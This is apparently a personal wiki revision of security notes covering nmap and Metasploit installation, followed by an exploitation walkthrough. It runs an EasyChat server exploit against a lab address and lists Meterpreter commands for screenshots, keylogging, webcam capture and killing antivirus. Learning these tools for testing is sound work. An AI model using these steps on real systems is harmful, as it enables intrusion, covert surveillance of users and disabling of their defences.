Difference between revisions of "Cloud Security"

Line 105: Line 105:
 
meterpreter > kill xxx // i.e., you can kill a antivirus program
 
meterpreter > kill xxx // i.e., you can kill a antivirus program
 
</source>
 
</source>
 +
 +
=Vulnarability Scanner=
 +
==Tools==
 +
* https://www.tenable.com/products/nessus

Revision as of 17:29, 9 January 2021

Notes

nmap installation/Debian Linux

Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.


to install nmap on debian server:

$ apt-get install nmap

listen any port:

$ nmap -sV 192.168.56.1

resource:


Installing Curl on Debian

$ sudo apt install curl

How to Install Metasploit Framework on Ubuntu/Debian

Download Metasploit installer using wget or curl command.

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Once the script is downloaded, make it executable.

$ chmod +x msfinstall

Then execute the installer to install Metasploit Framework on Debian.

$ ./msfinstall

The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.

Check your Framework version using:

$ msfconsole --version

When installation is completed, create and initialize the msf database.

$ msfdb init

This will create an initial database schema, set service account and start services. Output similar to below should be printed.

Use printed credentials to access MSF Web Service & API.

Launching msfconsole

Now that database is initialized, you can launch msfconsole

$ msfconsole

Verify database connectivity with the db_status command as shown below.

$ msf6 > db_status


Updating Metasploit Framework

$ msfupdate

Usage

$ msfconsole
$ msf > search easychat
$ msf > use exploit/windows/http/efs_easychatserver_username
msf exploit(windows/http/efs_easychatserver_username) > show options

msf exploit(windows/http/efs_easychatserver_username) > set RHOST 192.168.56.1

msf exploit(windows/http/efs_easychatserver_username) > exploit

meterpreter > ls

meterpreter > sysinfo

meterpreter > help

meterpreter > screenshot //to take a screenshot of the windows machine, we may use this command

meterpreter > keyscan_start //starts keylogger for the target port. 

meterpreter > keyscan_dump //displays all of the keylogger logs

meterpreter > webcam_snap //it runs the webcam and takes a photo of the active user

meterpreter > kill xxx // i.e., you can kill a antivirus program

Vulnarability Scanner

Tools